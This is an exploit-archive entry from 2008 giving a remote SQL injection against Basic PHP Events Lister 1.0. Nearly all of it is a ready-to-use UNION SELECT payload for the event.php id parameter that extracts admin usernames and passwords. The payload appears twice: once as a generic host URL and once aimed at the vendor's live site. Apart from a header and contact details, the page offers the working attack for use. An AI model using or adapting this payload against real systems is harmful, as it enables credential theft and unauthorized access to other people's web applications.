[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Basic PHP Events Lister 1.0 Remote SQL Injection Vulnerability
# Published : 2008-09-21
# Author : 0x90
# Previous Title : Invision Power Board <= 2.3.5 Remote SQL Injection Exploit
# Next Title : TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability


_____          ____   _____
      /  _   /  / / _   /  _  
      | | | |  / / ||_| | | | | |  
      | | | |    /  _   | | | | |  
      | |_| |  /     __ | | |_| |
      _____/ / /  |____/ _____/
              /  /

[~] Basic PHP Events Lister Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: Basic PHP Events Lister

[~] site: http://www.mevin.com

[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip

[~] Vulnerability Class: SQL Injection

[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--



[~] Exploit:

http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--

# www.Syue.com [2008-09-21]